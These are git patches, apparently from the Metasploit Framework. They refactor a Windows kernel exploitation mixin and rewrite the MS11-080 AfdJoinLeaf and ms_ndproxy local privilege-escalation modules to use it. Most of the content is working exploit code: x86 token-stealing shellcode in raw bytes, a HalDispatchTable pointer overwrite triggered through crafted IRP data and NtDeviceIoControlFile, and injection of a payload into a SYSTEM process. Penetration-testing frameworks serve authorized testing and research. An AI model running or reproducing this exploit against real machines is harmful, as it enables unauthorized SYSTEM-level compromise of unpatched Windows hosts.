+    vprint_status("HalDisPatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
+    hal_dispatch_table
   end
 
   #
@@ -48,28 +47,28 @@ module Exploit::Local::WindowsKernel
         'EnumDeviceDrivers',
         'BOOL',
         [
-          ["PBLOB", "lpImageBase", "out"],
-          ["DWORD", "cb", "in"],
-          ["PDWORD", "lpcbNeeded", "out"]
+          %w(PBLOB lpImageBase out),
+          %w(DWORD cb in),
+          %w(PDWORD lpcbNeeded out)
         ])
       session.railgun.add_function(
         'psapi',
         'GetDeviceDriverBaseNameA',
         'DWORD',
         [
-          ["LPVOID", "ImageBase", "in"],
-          ["PBLOB", "lpBaseName", "out"],
-          ["DWORD", "nSize", "in"]
+          %w(LPVOID ImageBase in),
+          %w(PBLOB lpBaseName out),
+          %w(DWORD nSize in)
         ])
     end
 
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("V*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
+      if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
@@ -81,7 +80,8 @@ module Exploit::Local::WindowsKernel
 
   #
   # Generate x86 token stealing shellcode suitable for use when overwriting the
-  # halDispatchTable+0x4.
+  # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx
+  # registers.
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
   #   _TOKEN, _UPID and _APLINKS.
@@ -108,6 +108,5 @@ module Exploit::Local::WindowsKernel
     tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
     tokenstealing
   end
-
 end
 end

From 893b9a6e99be561836e2b75876bc07e0b7df65f9 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sun, 3 Aug 2014 21:17:46 -0700
Subject: [PATCH 234/321] Add an open_device function for wrapping CreateFileA

---
 lib/msf/core/exploit/local/windows_kernel.rb | 81 +++++++++++++++-----
 1 file changed, 60 insertions(+), 21 deletions(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 5c5664d544..ab226585a6 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -6,6 +6,7 @@ module Exploit::Local::WindowsKernel
   # Find the address of nt!HalDispatchTable.
   #
   # @return [Integer] The address of nt!HalDispatchTable.
+  # @return [nil] If the address could not be found.
   #
   def find_haldispatchtable
     kernel_info = find_sys_base(nil)
@@ -36,8 +37,8 @@ module Exploit::Local::WindowsKernel
   #
   # @param drvname [String, nil] The name of the module to find, otherwise the kernel
   #   if this value is nil.
-  #
-  # @return [Array, nil] An array containing the base address and the located drivers name.
+  # @return [Array] An array containing the base address and the located drivers name.
+  # @return [nil] If the name specified could not be found.
   #
   def find_sys_base(drvname)
     unless session.railgun.dlls.keys.include?('psapi')
@@ -78,6 +79,28 @@ module Exploit::Local::WindowsKernel
     end
   end
 
+  #
+  # Open a device on a meterpreter session with a call to CreateFileA and return
+  # the handle. Both optional parameters lpSecurityAttributes and hTemplateFile
+  # are specified as nil.
+  #
+  # @param file_name [String] Passed to CreateFileA as the lpFileName parameter.
+  # @param desired_access [String, Integer] Passed to CreateFileA as the dwDesiredAccess parameter.
+  # @param share_mode [String, Integer] Passed to CreateFileA as the dwShareMode parameter.
+  # @param creation_disposition [String, Integer] Passed to CreateFileA as the dwCreationDisposition parameter.
+  # @param flags_and_attributes [String, Integer] Passed to CreateFileA as the dwFlagsAndAttributes parameter.
+  # @return [Integer] The device handle.
+  # @return [nil] If the call to CreateFileA failed.
+  #
+  def open_device(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0)
+    handle = session.railgun.kernel32.CreateFileA(file_name, desired_access, share_mode, nil, creation_disposition, flags_and_attributes, nil)
+    if handle['return'] == 0xffffffff
+      print_error("Failed to open the #{file_name} device (error: #{handle['GetLastError']})")
+      return nil
+    end
+    handle['return']
+  end
+
   #
   # Generate x86 token stealing shellcode suitable for use when overwriting the
   # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx
@@ -85,27 +108,43 @@ module Exploit::Local::WindowsKernel
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
   #   _TOKEN, _UPID and _APLINKS.
-  #
+  # @param arch [String] The architecture to return shellcode for. If this is nil,
+  #   the arch will be guessed from the target and then module information.
   # @return [String] The token stealing shellcode.
+  # @raise [ArgumentError] If the arch is incompatible.
   #
-  def token_stealing_shellcode_x86(target)
-    tokenstealing =  "\x52"                                                        # push edx                         # Save edx on the stack
-    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
-    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
-    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
-    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
-    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
-    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
-    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
-    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
-    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
-    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
-    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
-    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
-    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+  def token_stealing_shellcode(target, arch = nil)
+    arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
+    arch = module_info['Arch'] if arch.nil? && module_info['Arch']
+    if arch.nil?
+      print_error('Can not determine the target architecture')
+      fail ArgumentError, 'Invalid arch'
+    end
+
+    case arch
+    when ARCH_X86
+      tokenstealing =  "\x52"                                                        # push edx                         # Save edx on the stack
+      tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
+      tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
+      tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+      tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+      tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
+      tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+      tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+      tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
+      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+      tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+      tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+      tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
+      tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
+      tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+    else
+      # if this is reached the issue most likely exists in the exploit module
+      print_error('Unsupported arch for token stealing shellcode')
+      fail ArgumentError, 'Invalid arch'
+    end
     tokenstealing
   end
 end

From 4b73ad6f40cc1097f39c2bad9897309b2db0b447 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sun, 3 Aug 2014 21:42:17 -0700
Subject: [PATCH 235/321] Fix guessing the arch with modules specifying an
 array

---
 lib/msf/core/exploit/local/windows_kernel.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index ab226585a6..564263d899 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -115,7 +115,10 @@ module Exploit::Local::WindowsKernel
   #
   def token_stealing_shellcode(target, arch = nil)
     arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
-    arch = module_info['Arch'] if arch.nil? && module_info['Arch']
+    if arch.nil? && module_info['Arch']
+      arch = module_info['Arch']
+      arch = arch[0] if arch.class.to_s == 'Array' and arch.length == 1
+    end
     if arch.nil?
       print_error('Can not determine the target architecture')
       fail ArgumentError, 'Invalid arch'

From 6543b08eb4be38809ea0b64ed09ca5d19da7ca43 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 4 Aug 2014 11:07:17 -0700
Subject: [PATCH 236/321] Support writing a copy of the original token

---
 lib/msf/core/exploit/local/windows_kernel.rb | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 564263d899..110008fc57 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -108,12 +108,14 @@ module Exploit::Local::WindowsKernel
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
   #   _TOKEN, _UPID and _APLINKS.
+  # @param backup_token [Integer] An optional location to write a copy of the
+  #   original token to so it can be restored later.
   # @param arch [String] The architecture to return shellcode for. If this is nil,
   #   the arch will be guessed from the target and then module information.
   # @return [String] The token stealing shellcode.
   # @raise [ArgumentError] If the arch is incompatible.
   #
-  def token_stealing_shellcode(target, arch = nil)
+  def token_stealing_shellcode(target, backup_token = nil, arch = nil)
     arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
     if arch.nil? && module_info['Arch']
       arch = module_info['Arch']
@@ -124,15 +126,19 @@ module Exploit::Local::WindowsKernel
       fail ArgumentError, 'Invalid arch'
     end
 
+    tokenstealing = ''
     case arch
     when ARCH_X86
-      tokenstealing =  "\x52"                                                        # push edx                         # Save edx on the stack
+      tokenstealing << "\x52"                                                        # push edx                         # Save edx on the stack
       tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
       tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
       tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
       tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
       tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
       tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+      unless backup_token.nil?
+        tokenstealing << "\x89\x1d" + [backup_token].pack('V')                       # mov dword ptr ds:backup_token, ebx   # Optionaly write a copy of the token to the address provided
+      end
       tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
       tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
       tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)

From 58d29167e83117564a5850a972f2ed673b01e02c Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 4 Aug 2014 11:08:09 -0700
Subject: [PATCH 237/321] Refactor MS11-080 to use the mixin and for style

---
 .../windows/local/ms11_080_afdjoinleaf.rb     | 213 ++++++------------
 1 file changed, 75 insertions(+), 138 deletions(-)

diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
index 8a24a7a9d8..85442ead06 100644
--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
@@ -13,12 +14,14 @@ class Metasploit3 < Msf::Exploit::Local
   # the system process that it was injected into to die then it's also
   # possible that the system may become unstable.
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info, {
-      'Name'          => 'MS11-080 AfdJoinLeaf Privilege Escalation',
-      'Description'    => %q{
+      'Name'           => 'MS11-080 AfdJoinLeaf Privilege Escalation',
+      'Description'    => %q(
         This module exploits a flaw in the AfdJoinLeaf function of the
         afd.sys driver to overwrite data in kernel space.  An address
         within the HalDispatchTable is overwritten and when triggered
@@ -27,25 +30,24 @@ class Metasploit3 < Msf::Exploit::Local
         This module will elevate itself to SYSTEM, then inject the payload
         into another SYSTEM process before restoring it's own token to
         avoid causing system instability.
-      },
+      ),
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
           'Matteo Memelli', # original exploit and all the hard work
           'Spencer McIntyre' # MSF module
         ],
-      'Arch'          => [ ARCH_X86 ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
+      'Arch'           => [ARCH_X86],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC'   => 'thread'
         },
-      'Targets'       =>
+      'Targets'        =>
         [
-          [ 'Automatic', { } ],
-
-          [ 'Windows XP SP2 / SP3',
+          ['Automatic', {}],
+          ['Windows XP SP2 / SP3',
             {
               'HaliQuerySystemInfo' => 0x16bba,
               'HalpSetSystemInformation' => 0x19436,
@@ -55,8 +57,7 @@ class Metasploit3 < Msf::Exploit::Local
               '_APLINKS' => "\x88"
             }
           ],
-
-          [ 'Windows Server 2003 SP2',
+          ['Windows Server 2003 SP2',
             {
               'HaliQuerySystemInfo' => 0x1fa1e,
               'HalpSetSystemInformation' => 0x21c60,
@@ -65,220 +66,156 @@ class Metasploit3 < Msf::Exploit::Local
               '_UPID' => "\x94",
               '_APLINKS' => "\x98"
             }
-          ],
+          ]
         ],
-      'References'    =>
+      'References'     =>
         [
-          [ 'CVE', '2011-2005' ],
-          [ 'OSVDB', '76232' ],
-          [ 'EDB', '18176' ],
-          [ 'MSB', 'MS11-080' ],
-          [ 'URL', 'http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/' ]
+          %w(CVE 2011-2005),
+          %w(OSVDB 76232),
+          %w(EDB 18176),
+          %w(MSB MS11-080),
+          %w(URL http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/)
         ],
-      'DisclosureDate'=> 'Nov 30 2011',
-      'DefaultTarget' => 0
+      'DisclosureDate' => 'Nov 30 2011',
+      'DefaultTarget'  => 0
     }))
-
-    register_options([
-    ])
-
-  end
-
-  def find_sys_base(drvname)
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("V*")
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
-        return [address, current_drvname]
-      end
-    end
   end
 
   # Function borrowed from smart_hashdump
   def get_system_proc
     # Make sure you got the correct SYSTEM Account Name no matter the OS Language
-    local_sys = resolve_sid("S-1-5-18")
+    local_sys = resolve_sid('S-1-5-18')
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
 
     # Processes that can Blue Screen a host if migrated in to
-    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
     session.sys.process.processes.each do |p|
       # Check we are not migrating to a process that can BSOD the host
-      next if dangerous_processes.include?(p["name"])
-      next if p["pid"] == session.sys.process.getpid
-      next if p["pid"] == 4
-      next if p["user"] != system_account_name
+      next if dangerous_processes.include?(p['name'])
+      next if p['pid'] == session.sys.process.getpid
+      next if p['pid'] == 4
+      next if p['user'] != system_account_name
       return p
     end
   end
 
   def exploit
-    if sysinfo["Architecture"] =~ /wow64/i
-      print_error("Running against WOW64 is not supported")
+    if sysinfo['Architecture'] =~ /wow64/i
+      print_error('Running against WOW64 is not supported')
       return
-    elsif sysinfo["Architecture"] =~ /x64/
-      print_error("Running against 64-bit systems is not supported")
+    elsif sysinfo['Architecture'] =~ /x64/
+      print_error('Running against 64-bit systems is not supported')
       return
     end
 
     mytarget = target
     if mytarget.name =~ /Automatic/
-      os = sysinfo["OS"]
-      if os =~ /windows xp/i
-        mytarget = targets[1]
-      end
-      if ((os =~ /2003/) and (os =~ /service pack 2/i))
-        mytarget = targets[2]
-      end
-      if ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
+      os = sysinfo['OS']
+      mytarget = targets[1] if os =~ /windows xp/i
+      mytarget = targets[2] if (os =~ /2003/) && (os =~ /service pack 2/i)
+      if (os =~ /\.net server/i) && (os =~ /service pack 2/i)
         mytarget = targets[2]
       end
 
       if mytarget.name =~ /Automatic/
-        print_error("Could not identify the target system, it may not be supported")
+        print_error('Could not identify the target system, it may not be supported')
         return
       end
       print_status("Running against #{mytarget.name}")
     end
 
     if is_system?
-      print_error("This meterpreter session is already running as SYSTEM")
+      print_error('This meterpreter session is already running as SYSTE')
       return
     end
 
     this_proc = session.sys.process.open
-    kernel_info = find_sys_base(nil)
     base_addr = 0x1001
-    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
-    result = session.railgun.ws2_32.WSASocketA("AF_INET", "SOCK_STREAM", "IPPROTO_TCP", nil, nil, 0)
+    result = session.railgun.ws2_32.WSASocketA('AF_INET', 'SOCK_STREAM', 'IPPROTO_TCP', nil, nil, 0)
     socket = result['return']
 
     irpstuff =  rand_text_alpha(8)
     irpstuff << "\x00\x00\x00\x00"
     irpstuff << rand_text_alpha(4)
     irpstuff << "\x01\x00\x00\x00"
-    irpstuff << "\xe8\x00" + "4" + "\xf0\x00"
+    irpstuff << "\xe8\x00\x34\xf0\x00"
     irpstuff << rand_text_alpha(231)
 
-    if not this_proc.memory.writable?(0x1000)
-      result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("V"), nil, [ 0x1000 ].pack("V"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+    unless this_proc.memory.writable?(0x1000)
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [base_addr].pack('V'), nil, [0x1000].pack('V'), 'MEM_COMMIT | MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
     end
-    if not this_proc.memory.writable?(0x1000)
+    unless this_proc.memory.writable?(0x1000)
       print_error('Failed to properly allocate memory')
       return
     end
     this_proc.memory.write(0x1000, irpstuff)
 
-    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
-    halDispatchTable = halDispatchTable['return']
-    halDispatchTable -= hKernel
-    halDispatchTable += kernel_info[0]
-    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
+    haldispatchtable = find_haldispatchtable
+    return if haldispatchtable.nil?
 
-    halbase = find_sys_base("hal.dll")[0]
-    haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
-    halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
-    print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
-    print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
+    halbase = find_sys_base('hal.dll')[0]
+    hal_iquerysysteminformation = halbase + mytarget['HaliQuerySystemInfo']
+    hal_psetsysteminformation = halbase + mytarget['HalpSetSystemInformation']
+    print_status("HaliQuerySystemInformation Address: 0x#{hal_iquerysysteminformation.to_s(16).rjust(8, '0')}")
+    print_status("HalpSetSystemInformation Address: 0x#{hal_psetsysteminformation.to_s(16).rjust(8, '0')}")
 
     #### Exploitation ####
-    shellcode_address_dep   = 0x0002071e
+    shellcode_address_dep = 0x0002071e
     shellcode_address_nodep = 0x000207b8
-    padding             = make_nops(2)
-    halDispatchTable0x4 = halDispatchTable + 0x4
-    halDispatchTable0x8 = halDispatchTable + 0x8
+    padding = make_nops(2)
+    backup_token = 0x20900
 
     restore_ptrs =  "\x31\xc0"
-    restore_ptrs << "\xb8" + [ halpSetSystemInformation ].pack("V")
-    restore_ptrs << "\xa3" + [ halDispatchTable0x8 ].pack("V")
-    restore_ptrs << "\xb8" + [ haliQuerySystemInformation ].pack("V")
-    restore_ptrs << "\xa3" + [ halDispatchTable0x4 ].pack("V")
-
-    tokenstealing =  "\x52"
-    tokenstealing << "\x53"
-    tokenstealing << "\x33\xc0"
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
-    tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
-    tokenstealing << "\x8b\xc8"
-    tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x89\x1d\x00\x09\x02\x00"
-    tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
-    tokenstealing << "\x75\xe8"
-    tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x8b\xc1"
-    tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x5b"
-    tokenstealing << "\x5a"
-    tokenstealing << "\xc2\x10"
+    restore_ptrs << "\xb8" + [hal_psetsysteminformation].pack('V')
+    restore_ptrs << "\xa3" + [haldispatchtable + 8].pack('V')
+    restore_ptrs << "\xb8" + [hal_iquerysysteminformation].pack('V')
+    restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')
 
     restore_token =  "\x52"
     restore_token << "\x33\xc0"
     restore_token << "\x64\x8b\x80\x24\x01\x00\x00"
     restore_token << "\x8b\x40" + mytarget['_KPROCESS']
-    restore_token << "\x8b\x15\x00\x09\x02\x00"
+    restore_token << "\x8b\x15" + [backup_token].pack('V')
     restore_token << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
     restore_token << "\x5a"
     restore_token << "\xc2\x10"
 
-    shellcode = padding + restore_ptrs + tokenstealing
+    shellcode = padding + restore_ptrs + token_stealing_shellcode(mytarget, backup_token)
 
     this_proc.memory.write(shellcode_address_dep, shellcode)
     this_proc.memory.write(shellcode_address_nodep, shellcode)
     this_proc.memory.protect(0x00020000)
 
-    addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("vvVVV")
+    addr = [2, 4455, 0x7f000001, 0, 0].pack('vvVVV')
     result = session.railgun.ws2_32.connect(socket, addr, addr.length)
     if result['return'] != 0xffffffff
-      print_error("The socket is not in the correct state")
+      print_error('The socket is not in the correct state')
       return
     end
 
-    print_status("Triggering AFDJoinLeaf pointer overwrite...")
-    result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
-    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+    print_status('Triggering AFDJoinLeaf pointer overwrite...')
+    session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, haldispatchtable + 5, 0)
+    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
-    if not is_system?
-      print_error("Exploit failed")
+    unless is_system?
+      print_error('Exploit failed')
       return
     end
 
-    begin
-      proc = get_system_proc
-      print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}")
-      host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS)
-      mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024))
-
-      print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}")
-      host_process.memory.write(mem, payload.encoded)
-      host_process.thread.create(mem, 0)
-    rescue ::Exception => e
-      print_error("Failed to Inject Payload")
-      print_error(e.to_s)
+    proc = get_system_proc
+    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
+    unless execute_shellcode(payload.encoded, nil, proc['pid'])
+      print_error('An error occurred while executing the payload')
     end
 
     # Restore the token because apparently BSODs are frowned upon
-    print_status("Restoring the original token...")
+    print_status('Restoring the original token...')
     shellcode = padding + restore_ptrs + restore_token
     this_proc.memory.write(shellcode_address_dep, shellcode)
     this_proc.memory.write(shellcode_address_nodep, shellcode)
 
-    result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
-    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+    session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, haldispatchtable + 5, 0)
+    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
   end
-
 end

From 86e237721892a5f932939b06734b9ffb1f06ab75 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 4 Aug 2014 11:28:00 -0700
Subject: [PATCH 238/321] Switch ms_ndproxy to use the new WindowsKernel mixin

---
 modules/exploits/windows/local/ms_ndproxy.rb | 124 ++-----------------
 1 file changed, 7 insertions(+), 117 deletions(-)

diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
index 1ac9a2ba6d..4186b09a40 100644
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
@@ -84,63 +86,6 @@ class Metasploit3 < Msf::Exploit::Local
       'DisclosureDate'=> 'Nov 27 2013',
       'DefaultTarget' => 0
     }))
-
-  end
-
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
